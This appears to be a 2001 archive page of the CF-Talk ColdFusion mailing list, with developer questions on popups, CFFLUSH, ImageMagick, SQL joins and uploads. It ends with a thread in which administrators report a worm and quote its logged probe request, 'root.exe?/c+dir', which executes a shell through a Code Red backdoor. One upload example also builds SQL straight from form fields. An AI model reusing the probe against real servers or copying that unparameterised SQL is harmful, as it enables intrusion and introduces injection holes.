date:20010918

cflocation/javascript

2001-09-18 Thread Garry Red 5


This is a multi-part message in MIME format.

--=_NextPart_000_0013_01C14102.4BF2FC00
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hi

We have a problem involving cflocation. In our code we have a user-intensive
form, and when this is processed various (complicated) checks are performed
to ensure data validity. If the numbers entered do not meet certain
conditions, the page uses cflocation to redirect to a standard error page.
However we have received emails suggesting that sometimes when this happens,
and the user pressed back on their browser, their inputted data is lost and
they have to enter it all again.

We hoped to fix it with the following code, which we hoped would open a
smaller window with the error message, while leaving the main window with
data intact for easy modication:

var popupfeatures =
"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,r
esizable=yes,width=530,height=350";
function showWindow(myurl)
{
 var win = open(myurl,'popupwindow',popupfeatures);
 win.focus();
}



But while this works on my machine, it does not run on my colleague's. He is
using Win2000 whereas I am using NT. Maybe it has something to do with the
javascript running on the client while the cflocation is resolved on the
server (Just a guess. I have no idea.)

So my question is how can I achieve this. I've tried various other things
which open a popup window but continues processing the main window, losing
the entered data display. Any advice would help.

By the way, I know you might suggest that I look into why the page is not
remembering the data on the back button, or that I simply repost back to the
form displaying the error message and data, but believe me, in the context
of this code, this is very very complicated.

Thanks

Garry

--=_NextPart_000_0013_01C14102.4BF2FC00
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






Hi
 
We =
have a problem=20
involving cflocation. In our code we have a user-intensive form, and =
when this=20
is processed various (complicated) checks are performed to ensure data =
validity.=20
If the numbers entered do not meet certain conditions, the page uses =
cflocation=20
to redirect to a standard error page. However we have received emails =
suggesting=20
that sometimes when this happens, and the user pressed back on their =
browser,=20
their inputted data is lost and they have to enter it all=20
again.
 
We =
hoped to fix it=20
with the following code, which we hoped would open a smaller window with =
the=20
error message, while leaving the main window with data intact for easy=20
modication:
 
   =20
var popupfeatures =3D=20
"toolbar=3Dno,location=3Dno,directories=3Dno,status=3Dno,menubar=3Dno,scr=
ollbars=3Dyes,resizable=3Dyes,width=3D530,height=3D350";  &=
nbsp;=20
function showWindow(myurl)=20
{ var win =3D=20
open(myurl,'popupwindow',popupfeatures); =
;win.focus();   =20
}
 
   =20
=20

 
But =
while this works=20
on my machine, it does not run on my colleague's. He is using Win2000 =
whereas I=20
am using NT. Maybe it has something to do with the javascript running on =
the=20
client while the cflocation is resolved on the server (Just a guess. I =
have no=20
idea.)
 
So my =
question is=20
how can I achieve this. I've tried various other things which open a =
popup=20
window but continues processing the main window, losing the entered data =

display. Any advice would help.
 
By the =
way, I know=20
you might suggest that I look into why the page is not remembering the =
data on=20
the back button, or that I simply repost back to the form displaying the =
error=20
message and data, but believe me, in the context of this code, this is =
very very=20
complicated.
 
Thanks
 
Garry

--=_NextPart_000_0013_01C14102.4BF2FC00--

FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: ImageMagick - anyone use with CF?

2001-09-18 Thread Scott Weikert


Thanks guys! Just what I needed to hear :)

If any of you guys could toss me some examples of how you use CFEXECTUTE
(i.e. the command you pass through it) to do various things, it'd probably
help save me some time. Don't go out of your way, mind you... don't want to
eat up anyone's time :)

Thanks!
--Scott
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Page Break in Excel

2001-09-18 Thread J L


Hi All,

I am trying to using CF to generate a document which is going to be
export into Excel. In the document, I need to insert several page breaks
so the printout will look nice. 

I have tried to use 


or 

or 

and none of them works.

Does anyone have experience in this? Thanks in advance.


J

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE:

2001-09-18 Thread Benjamin S. Rogers


You might try adding "table-layout:fixed" to the style attribute of your
table tag. I haven't tried it myself but it might be worth a shot.

Benjamin S. Rogers
http://www.c4.net/
v.508.240.0051
f.508.240.0057

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:49 PM
To: CF-Talk
Subject: RE: 


> So it appears that  does not work within a table.  Am I
> correct?  This seems like a SEVERE limitation of the tag.  What site
> doesn't use tables to format output?

This isn't a limitation of the tag, but rather a limitation of the browser.
To display a table on the page, the browser needs to know everything about
the table at once, generally, so if you don't provide all of the table data
at once, the browser won't show any of the table until it receives the rest.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE:

2001-09-18 Thread Billy Cravens


That's a limitation of browsers, not CFFLUSH.  Most browsers won't
render a partial table - the table must be syntactically correct (end
tags) at the point you flush it.

---
Billy Cravens
Web Development, EDS
[EMAIL PROTECTED]


-Original Message-
From: Bill Holloway [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 1:12 PM
To: CF-Talk
Subject: 


So it appears that  does not work within a table.  Am I
correct?  This seems like a SEVERE limitation of the tag.  What site
doesn't use tables to format output?
 
Bill
 



~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Killing a Structure

2001-09-18 Thread Chad McCue


I am trying to find a good way to clear a structure when a user closes 
their browser window. My application calls for creating a structure of 
users as people log in. This structure will not allow the same Users to 
log in twice or any other user to log in with the same username and 
password as someone who already is logged in. 

The problem is when the user closes their browser,  I need to delete 
that user from the structure. Any ideas for this would be great. 

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

sql help please

2001-09-18 Thread Won Lee


QUERY
===

SELECT *
FROM surveys S, surveySub SB, categories C LEFT OUTER JOIN questions Q ON
(C.categoryID = Q.categoryID) LEFT OUTER JOIN questionsN QN ON (Q.questionID
= QN.questionID) LEFT OUTER JOIN questionsW QW ON (Q.questionID =
QW.questionID)
WHERE (S.surveyID = SB.surveyID AND SB.categoryID = C.categoryID)



===
RECORD RETURNED
===
surveySubID categoryID category questionID question catOrder catweight
9 12 NOO NULL NULL 1 1
7 10 another one 1 building type 1 1
7 10 another one 2 building size 1 1
8 9 test 3 another question 1 1


===
CODE
===

subsurveyid: #getSurvey.surveySubID#
cat: #getSurvey.category#
catid: #getSurvey.categoryID#



Questions
Question: #getSurvey.question#
Add question to this category




PROBLEM


catid: #getSurvey.categoryID#

This line of code should be pumping out the categoryID returned in the
record set.  It works fine as long as there is a question associated with
the category.  However, if the category does not have a question associated
with it it returns a null.  I thought I should at least get the categoryID
back if I did a LEFT JOIN.  Any ideas?

Won

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE:

2001-09-18 Thread Raymond Camden


You must remember that CF is not HTML. CFFLUSH simply sends text to the
browser. If the browser refuses to render it, it's the browser's fault,
not CF. I'm not surprised that the browser wouldn't render a half
complete table. Tables are complex, and need to be complete to render.

Another example: IE will not display content until a certain amount of
info has been received from the server. So, if you do:

Ray


You will NOT see "Ray" in your browser (this is assuming you have no
other HTML above the word 'Ray'). This is NOT the fault of CFFLUSH, it's
just the browser being anal. I get around it by just using RepeatString
to output a padded string.

===
Raymond Camden, Principal Spectra Compliance Engineer for Macromedia

Email: [EMAIL PROTECTED]
Yahoo IM : morpheus

"My ally is the Force, and a powerful ally it is." - Yoda 

> -Original Message-
> From: Bill Holloway [mailto:[EMAIL PROTECTED]] 
> Sent: Tuesday, September 18, 2001 2:12 PM
> To: CF-Talk
> Subject: 
> 
> 
> So it appears that  does not work within a table.  
> Am I correct?  This seems like a SEVERE limitation of the 
> tag.  What site doesn't use tables to format output?
>  
> Bill
>  
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE:

2001-09-18 Thread Dave Watts


> So it appears that  does not work within a table.  Am I
> correct?  This seems like a SEVERE limitation of the tag.  What site
> doesn't use tables to format output?

This isn't a limitation of the tag, but rather a limitation of the browser.
To display a table on the page, the browser needs to know everything about
the table at once, generally, so if you don't provide all of the table data
at once, the browser won't show any of the table until it receives the rest.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: XML Parser for CF

2001-09-18 Thread Nelson Winters


Check out cf_soxml at www.siteobjects.com.  If you have any questions, Brett
is very helpful on their support forums.

Nelson


- Original Message -
From: "Critter" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 12:59 PM
Subject: XML Parser for CF


> Hello CF-Talk,
>
>   anyone have any suggestions for a decent one?
>
> --
> Best regards,
>
> Critter, MMCP
> Certified ColdFusion Developer
>
> Crit[s2k] - 
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: ImageMagick - anyone use with CF?

2001-09-18 Thread Bob Hendren


I've used it with the CFEXECUTE tag, but that's about it.  Works great
there.

-
Bob Hendren
President and CEO
ListingWare
Web:  http://www.listingware.com
Direct:  770-836-3231
Toll Free:  800-867-4707 ext. 102
Fax:  800-867-4707
Email:  [EMAIL PROTECTED]

> -Original Message-
> From: Scott Weikert [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 1:50 PM
> To: CF-Talk
> Subject: ImageMagick - anyone use with CF?
>
>
> I found some references to an image manipulation toolset, called
> ImageMagick
> (http://www.imagemagick.org/). This looks like JUST the thing I need for a
> project I'm working on.
>
> However, on the site, there's no mention of it's usage with CF, or whether
> it's even a doable thing.
>
> Anyone out there in CF-Talk-land use ImageMagick with CF? If so, could you
> describe your experiences with it, both as far as interfacing with CF, and
> the toolset's abilities?
>
> Thanks in advance,
> --Scott
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: ImageMagick - anyone use with CF?

2001-09-18 Thread Chad Gray


I have used it on one demo site i setup.  I used ImageMagick to create 
thumbnails of images with the mogrify command.  It works pretty well, but i 
have never tested it on a live server with a lot of traffic.

I was using CFEXECUTE to run the program.


At 11:50 AM 9/18/2001 -0600, you wrote:
>I found some references to an image manipulation toolset, called ImageMagick
>(http://www.imagemagick.org/). This looks like JUST the thing I need for a
>project I'm working on.
>
>However, on the site, there's no mention of it's usage with CF, or whether
>it's even a doable thing.
>
>Anyone out there in CF-Talk-land use ImageMagick with CF? If so, could you
>describe your experiences with it, both as far as interfacing with CF, and
>the toolset's abilities?
>
>Thanks in advance,
>--Scott
>
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: ImageMagick - anyone use with CF?

2001-09-18 Thread Dave Watts


> I found some references to an image manipulation toolset, 
> called ImageMagick (http://www.imagemagick.org/). This looks 
> like JUST the thing I need for a project I'm working on.
> 
> However, on the site, there's no mention of it's usage with 
> CF, or whether it's even a doable thing.
> 
> Anyone out there in CF-Talk-land use ImageMagick with CF? If 
> so, could you describe your experiences with it, both as far 
> as interfacing with CF, and the toolset's abilities?

I haven't used it yet myself, but someone in our office is starting to play
with it on Linux. I don't see why you couldn't use it, using CFEXECUTE to
execute commands.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: ImageMagick - anyone use with CF?

2001-09-18 Thread Kurt Ward

I have used it before without a hitch using cfexecute.  Not my favorite way
of doing things, but it works.

Kurt

-Original Message-
From: Scott Weikert [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:50 PM
To: CF-Talk
Subject: ImageMagick - anyone use with CF?

I found some references to an image manipulation toolset, called ImageMagick
(http://www.imagemagick.org/). This looks like JUST the thing I need for a
project I'm working on.

However, on the site, there's no mention of it's usage with CF, or whether
it's even a doable thing.

Anyone out there in CF-Talk-land use ImageMagick with CF? If so, could you
describe your experiences with it, both as far as interfacing with CF, and
the toolset's abilities?

Thanks in advance,
--Scott

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

File Upload from MAC to PC-HELP!

2001-09-18 Thread Steven A. del Sol


Ok, I am sure this is an easy issue for someone and I am just missing 
something simple but this is kicking my @$$!

I have a client who needs to upload images from his Mac to a WIN2K server 
running CF5. here is the code. If it is easier for you to rewrite the code 
please do.
Any and all help will be appreciated.





UPLOAD FORM PAGE


 

 
 
 
 
 
 


 
 
 


RESULT PAGE



#form.prodid#

select *
from image
where prodid = #form.prodid#



insert into image(prodid, #form.here#)
values (#form.prodid#, '#file.clientfile#')



update image
set
#form.here# = '#file.clientfile#'
where prodid = #form.prodid#


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

cf-talk@houseoffusion.com

2001-09-18 Thread Bill Holloway


So it appears that  does not work within a table.  Am I
correct?  This seems like a SEVERE limitation of the tag.  What site
doesn't use tables to format output?
 
Bill
 


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: XML Parser for CF

2001-09-18 Thread Rich Tretola

Try downloading the XML toolkit form the devexhange.
Rich

-Original Message-
From: Critter [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:00 PM
To: CF-Talk
Subject: XML Parser for CF

Hello CF-Talk,

  anyone have any suggestions for a decent one?

-- 
Best regards,

Critter, MMCP
Certified ColdFusion Developer

Crit[s2k] - 

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: MSN

2001-09-18 Thread Paris Lundis


Incidentally I emailed Lewis who created the UDP kit to ask if he had 
fiddled with any of the instant messanger specs and utilizing such 
through the kit... no response yet...

I am interested if anyone has/would like to undertake such a project.

-paris
[finding the future in the past, passing the future in the present]
[connecting people, places and things]


-Original Message-
From: "admin" <[EMAIL PROTECTED]>
Date: Tue, 18 Sep 2001 10:00:57 -0700
Subject: Re: MSN

> Thnks Billy,
> 
> I'l have a look at that. The customer wants to be able to do
> something like
> livehelper.com, but in house, and without paying anything for it -
> usual
> story !
> 
> - Original Message -
> From: "Billy Cravens" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 8:50 AM
> Subject: RE: MSN
> 
> 
> > If AIM is installed, doesn't it provide support for a proprietary
> > protocol (aim://) in the browser?
> >
> > Also, I know that some software (like Jabber) can talk to a number
> of
> > these services at a pretty low level.  Some of it is even open
> source -
> > perhaps you could pull some code off of SourceForge and write your
> own
> > back-end
> >
> > ---
> > Billy Cravens
> > Web Development, EDS
> > [EMAIL PROTECTED]
> >
> >
> > -Original Message-
> > From: BT [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 10:09 AM
> > To: CF-Talk
> > Subject: RE: MSN
> >
> >
> > how can you send it to AIM?
> >
> >
> > -Original Message-
> > From: Dan Phillips [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 11:05 AM
> > To: CF-Talk
> > Subject: RE: MSN
> >
> >
> > From what I have found, MSN is not too friendly when it comes to
> sending
> > messages unless you use their client software. I know Yahoo, AIM,
> and
> > ICQ all have a way that you can use HTML to send a message to
> users.
> >
> > Thank you,
> >
> > Dan Phillips
> > Lead Support Technician/ColdFusion Administrator
> > Express Technologies, Inc.
> > dba CFXhosting.com
> >
> >
> >
> > -Original Message-
> > From: Rey Bango [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 10:52 AM
> > To: CF-Talk
> > Subject: Re: MSN
> >
> >
> > AFAIK, they have no API for that. If you find it, please let me
> know.
> > I've been wanting to add the functionality myself.
> >
> > Rey...
> >
> > - Original Message -
> > From: "webmaster" <[EMAIL PROTECTED]>
> > To: "CF-Talk" <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 10:49 AM
> > Subject: MSN
> >
> >
> > > Does anyone know how to send a MSN message from a CF app ?
> > >
> > >
> > > TIA
> > >
> > > Richard
> > >
> > >
> >
> >
> >
> > 
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: XML Parser for CF

2001-09-18 Thread Pete Freitag


CFX_XMLParser at http://www.cfdev.com/xml


+
Pete Freitag ([EMAIL PROTECTED])
CFDEV.COM
ColdFusion Developer Resources
http://www.cfdev.com/
 

-Original Message-
From: Critter [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:00 PM
To: CF-Talk
Subject: XML Parser for CF


Hello CF-Talk,

  anyone have any suggestions for a decent one?

-- 
Best regards,

Critter, MMCP
Certified ColdFusion Developer

Crit[s2k] - 

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

ImageMagick - anyone use with CF?

2001-09-18 Thread Scott Weikert


I found some references to an image manipulation toolset, called ImageMagick
(http://www.imagemagick.org/). This looks like JUST the thing I need for a
project I'm working on.

However, on the site, there's no mention of it's usage with CF, or whether
it's even a doable thing.

Anyone out there in CF-Talk-land use ImageMagick with CF? If so, could you
describe your experiences with it, both as far as interfacing with CF, and
the toolset's abilities?

Thanks in advance,
--Scott
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

SQL question about JOIN

2001-09-18 Thread Chad Gray


The first query takes 9seconds to process, the 2second query takes 
1seconds to process.

They return the same data.  Why should you use an LEFT OUTER JOIN, or any 
JOIN for that matter when you can say WHERE JOBINFO.JOBNUM = 
ACTIVITYLOG.JOBNUM???



SELECT JOBINFO.JOBNUM, JOBINFO.JOBNAME, JOBINFO.COMPANYNAME, 
ACTIVITYLOG.LOGIN, ACTIVITYLOG.LOGOUT, ACTIVITYLOG.EMPLOYEENAME, 
ACTIVITYLOG.EMPLOYEENUM, ACTIVITYLOG.ACTIVITYDESCRIPTION
FROM JOBINFO LEFT OUTER JOIN ACTIVITYLOG ON JOBINFO.JOBNUM = 
ACTIVITYLOG.JOBNUM
WHERE ACTIVITYLOG.EMPLOYEENUM = #EMPLOYEENUM# AND
ACTIVITYLOG.LOGOUT is null AND
ACTIVITYLOG.LOGIN is not null
ORDER BY JOBINFO.JOBNUM, ACTIVITYLOG.LOGIN




SELECT JOBINFO.JOBNUM, JOBINFO.JOBNAME, JOBINFO.COMPANYNAME, 
ACTIVITYLOG.LOGIN, ACTIVITYLOG.LOGOUT, ACTIVITYLOG.EMPLOYEENAME, 
ACTIVITYLOG.EMPLOYEENUM, ACTIVITYLOG.ACTIVITYDESCRIPTION
FROM JOBINFO, ACTIVITYLOG
WHERE JOBINFO.JOBNUM = ACTIVITYLOG.JOBNUM AND
ACTIVITYLOG.EMPLOYEENUM = #EMPLOYEENUM# AND
ACTIVITYLOG.LOGOUT is null AND
ACTIVITYLOG.LOGIN is not null
ORDER BY JOBINFO.JOBNUM, ACTIVITYLOG.LOGIN

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Code Red backdoor triggered?

2001-09-18 Thread Bill Davidson


Getting SLAMMED too...  So far only on one box as far as I can tell, but it
is starting to generate so much traffic it is bringing it to its knees at
some regular intervals.  We're definitely patched and have port blocking on
(not that that helps port 80), so hopefully this latest onslaught is
following the same rules as previous ones.

There's some sick people out there - what is their electronic version of a
week ago's events?  Give me a break

-Bill
brainbox
- Original Message -
From: "Rich Wild" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:37 AM
Subject: RE: Code Red backdoor triggered?


> even we're getting hammered with syn flood attacks.
>
> Rich Wild
>
> > -Original Message-
> > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 15:52
> > To: CF-Talk
> > Subject: FW: Code Red backdoor triggered?
> >
> >
> > It seems there may be some unusual network activity today
> > worth noting.
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> >
> >
> > -Original Message-
> > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, 18 September, 2001 10:49
> > To: [EMAIL PROTECTED]
> > Subject: RE: Code Red backdoor triggered?
> >
> >
> > > Heads up. Pay attention to your servers today. I just
> > > started detecting a *ton* of these requests. I think it's
> > > a follow-up worm programmed to take advantage of the
> > > backdoors Code Red dropped on infected computers. Maybe a
> > > Code Red III?
> > >
> > > -Cameron
> > >
> > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > dhcp181.onewebsystems.com
> > > (130.205.102.181) on port 80 (tcp).
> > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > /scripts/root.exe?/c+dir HTTP/1.0
> > > Host: www
> > > Connnection: close
> >
> > After a more careful reading, I don't think this is an attack
> > at all. I
> > think it's worse than an attack.
> >
> > The GET request doesn't do anything except run the DOS dir
> > command using the
> > command processor. But, if a server responds with an HTTP 200
> > status code,
> > this indicates that the server is vulnerable to running
> > cmd.exe through the
> > web server.
> >
> > So, my guess is that this is a vulnerability scan. Once a
> > list of vulnerable
> > servers is compiled, a real attack would take much less time
> > than a Code
> > Red-style attack, since you could build the list of
> > vulnerable servers into
> > the attack code!
> >
> > This idea has been discussed a bit in the last month or so -
> > it's called a
> > "Warhol" worm, the idea being that an attack might cover the mass of
> > vulnerable machines in fifteen minutes. Here's a URL to the article:
> >
> > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> 5&mode=nocomme
> nt&threshold=
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
> --
--
> 
> Control your subscriptions to ACFUG lists via the ACFUG website at
>
> 
~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Code Red backdoor triggered?

2001-09-18 Thread Matt Robertson


Looks like I'm getting about 310 or so per minute, if the 1-minute sample I
took is representative.  Deleted a 15mb log of attempts and its already
grown to 1mb again.  The Microsoft urlscan tool is keeping all of this out
of the IIS logs.

Interestingly, *all* of the default.ida requests I *used* to get have
disappeared to be replaced by all of these blasted malformed requests for
cmd.exe.  That tells me this is the old Code Red II morphing into something
new.  Possibly a warhol-style worm has body-slammed all of the
previously-infected CR II boxes with some new task to accomplish?

BAH!

-
Matt Robertson  [EMAIL PROTECTED]
MSB Designs, Inc. http://mysecretbase.com
-


- Original Message -
From: "Tristram Charnley" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 9:17 AM
Subject: RE: Code Red backdoor triggered?


Yes we're getting hammered too - exactly the same requests


Tristram Charnley


~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Leon Oosterwijk


Does anyone know what the Log signature for Apache is for this new
virus/worm?

Leon


-Original Message-
From: Kelly Matthews [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:54 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


I use black ice on my server. THe code red used to come in as IIS system32
command
course since i was patched it did nothing, well today i have a PLETHORA of
attacks
all labeled EITHER HTTP UTF8 backlick and HTTP URL with double-encoded ..
My guess is it's a new worm we are getting SLAMMED but it's not shutting
down
services like before the firewall is currently blocking it but not sure
exactly what
its trying to do.
KElly

-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:26 AM
To: CF-Talk
Subject: FW: Code Red backdoor triggered?


More on the .eml files.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


-Original Message-
From: Dave Watts 
Sent: Tuesday, 18 September, 2001 11:25
To: '[EMAIL PROTECTED]'
Subject: RE: Code Red backdoor triggered?


> It looks like when you surf to an infected site, it opens IE 
> with a file named readme.eml which appears to contain a readme.exe.  
> I don't have an email client on the server so I dont know what 
> would happen if I did and I am not going to test it out. I 
> also see a number (at least 10 - haven't counted yet) of 
> different sites sending out requests, and interestingly they 
> are all in the same subnet: my ip is 209.186.186.37 and they 
> are all from 209.x.x.x

I just checked the logfile for one virtual server here, and I'm getting lots
of attacks from similar network addresses. I used a command-line HTTP
browser to connect to one of the attacking IPs, and saw the same
"readme.eml" thing, at the bottom of what appeared to be a regular page.

Based on my reading of the logfile, I think this is some Code Red variant or
followup; it's using the Code Red-specific backdoors mentioned in the
incidents.org URL Cameron posted. The only thing that doesn't sound right to
me is that I thought the Code Red trojan payload only worked with Win2K
(simply crashing IIS on NT 4), but several of the attacking servers are
identifying themselves as IIS 4.

Dave Watts, CTO, Fig Leaf Software 
http://www.figleaf.com/ 
voice: (202) 797-5496 


~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Eric Dawson


>>We have temporarily renamed cmd.exe
will that potential have any side effects? Guess I'll find out.

Eric Dawson



From: "Larry Juncker" <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: CF-Talk <[EMAIL PROTECTED]>
Subject: RE: Code Red backdoor triggered?
Date: Tue, 18 Sep 2001 11:12:22 -0500

We are having the same thing happen. From looking at the IIS logs, this worm
or whatever is using cmd.exe.
We have temporarily renamed cmd.exe in the system32 folder of NT until we
